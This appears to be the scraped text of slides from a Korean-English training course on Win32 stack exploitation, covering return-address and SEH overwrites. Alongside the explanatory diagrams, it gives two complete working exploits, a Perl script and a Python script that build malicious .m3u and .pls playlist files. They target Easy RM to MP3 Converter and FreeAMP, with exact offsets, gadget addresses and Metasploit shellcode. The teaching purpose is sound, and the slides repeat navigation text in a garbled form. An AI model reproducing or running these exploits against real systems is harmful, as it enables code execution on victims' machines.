  • 14. Overwrite RET arg2 arg1 A A A A Target Address (to Shell Code) &ret (saved eip) saved ebp A A A A A A A A A A A A char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 15. Overwrite RET arg2 arg1 &buf(included &ret (saved shell eip) code) Padding saved ebp C o d e char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction S h e l l Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 16. Exercise Time :D Target Info Win32 Easy RM to MP3 Converter v.2.7.3.700 Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip) Vulnerability Type Buffer Overflow (Stack Based) by Parsing Playlist Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 17. Exercise Time :D Tip Generate Pattern by using mona plugin (!mona pattern_create 30000) nop sleds (0x90 * N) Shell code (windows/exec calc.exe) "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 18. Exercise Time :D Exploit Info .m3u Playlist File Format length of junk data is 26037 gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 19. Exercise Time :D Exploit Code (exploit.pl) my $file= "exploit.m3u"; my $junk= "A" x 26037; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $shellcode = "x90" x 25; # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc $shellcode = $shellcode . "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; open($FILE,">$file"); print $FILE $junk.$eip.$shellcode; close($FILE); print "m3u File Created successfullyn"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 20. Overwrite SEH (Error Handler) 구조적 예외 처리 핸들러(SEH:Structured Exception Handler) 윈도우에서 제공하는 예외 처리 방식 exeception handler 사용 Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 21. Exception Handler 예외 핸들러(Exception Handler)는 애플리케이션의 예외 발생에 대처하는 목적을 가진 애플리케이션 내부 조각들을 의미한다 (일반적인 예외 처리 메커니즘은 아래 참고) try { // run stuff. if an exception occurs, go to <catch> code } catch { // run stuff when exception occurs } Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 22. Exception Handler high address Exception Handler Arguments Return Address Stack Frame Pointer Local Variables (buffer area) low address try { // run stuff. if an exception occurs, go to <catch> code } catch { // run stuff when exception occurs } Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 23. Exception Handler 예외 핸들러 (Exception Handler) 는 두가지 포인터를 가진다 다음 Exception Handler 구조체를 가리키는 포인터 예외 핸들러의 실제 주소를 가리키는 포인터 (SE Handler) high address Exception Handler Arguments Return Address Stack Frame Pointer Local Variables (buffer area) low address Exception Handler Next Exception Handler Address Exception Handler Address Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 24. Exception Handler Exception Handler #1 Next Exception Handler Address Exception Handler Address Exception Handler #2 Next Exception Handler Address Exception Handler Address Exception Handler #3 Next Exception Handler Address Exception Handler Address MSVCRT! exhandler 0xFFFFFFFF Exception Handler Address Occurs Exception Terminated Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 25. high address pointer to next SEH record pointer to SEH Handler Arguments Return Address Stack Frame Pointer Local Variables (buffer area) low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction Track3. Exploitation Overwrite SEH Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 26. Track3. Exploitation Overwrite SEH high address pointer to next SEH record pointer to SEH Handler Arguments Return Address Stack Frame Pointer Local Variables (buffer area) low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A A A A A Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 27. Track3. Exploitation Overwrite SEH high address A A A A pointer to next SEH record pointer to SEH Handler A A A A Arguments Return Address Stack Frame Pointer Local Variables (buffer area) A A A A A A A A A A A A low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A A A A A Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 28. Track3. Exploitation Overwrite SEH high address A A A A pointer to next SEH record pointer to SEH Handler A A A A Arguments Return Address Stack Frame Pointer Local Variables (buffer area) A A A A A A A A A A A A low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A A A A A Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 29. Overwrite SEH high address jmp to shellcode pointer to next SEH record pointer to SEH Handler pop/pop/ret Arguments Return Address Stack Frame Pointer Local Variables (buffer area) A A A A Padding C o d e A A A A low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A S h e l l Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 30. Exercise Time :D Target Info Win32 FreeAMP Audio Player v.2.0.7 Download Link is (http://outofcontrol.co.kr/vulnApp/FreeAmp.zip) Vulnerability Type Buffer Overflow (Stack Based) by Parsing Playlist Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 31. Exercise Time :D Tip Generate Pattern by using mona plugin (!mona pattern_create 30000 / !mona seh) nop sleds (0x90 * N) Shell code (windows/exec calc.exe) "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 32. Exercise Time :D Exploit Info .pls Playlist File Format length of junk data is 893 gadget is 0x004027BF (Pop/Pop/Ret From freeamp.exe) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 33. Exercise Time :D Exploit Code (exploit.py) #!/usr/bin/python from struct import pack from time import sleep print ''' FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit by h2spice ''' # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc shellcode =("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1"+ "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30"+ "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa"+ "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96"+ "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b"+ "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a"+ "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83"+ "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98"+ "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61"+ "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05"+ "x7fxe8x7bxca") buf = ("x41" * 893) buf += ("xebx08x90x90") #nSEH (jmp to shellcode) buf += pack('<L',0x004027BF) #SEH (POP/POP/RETN) buf += ("x90" * 20) buf += shellcode buf += "x41" * (30000-len(buf)) exploit = ('''[playlist] File1=http://'''+buf+''' NumberOfEntries=1 Version=2 ''') print "tt[+]Creating File Exploit.pls..." sleep(1) try: f = open("Exploit.pls","wb") f.write(exploit) f.close() print "tt[+]File Exploit.pls Created." sleep(2) except: print "tt[-]Error in Create file Exploit.pls" sleep(1) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 34. Thank You :) See you the week after next week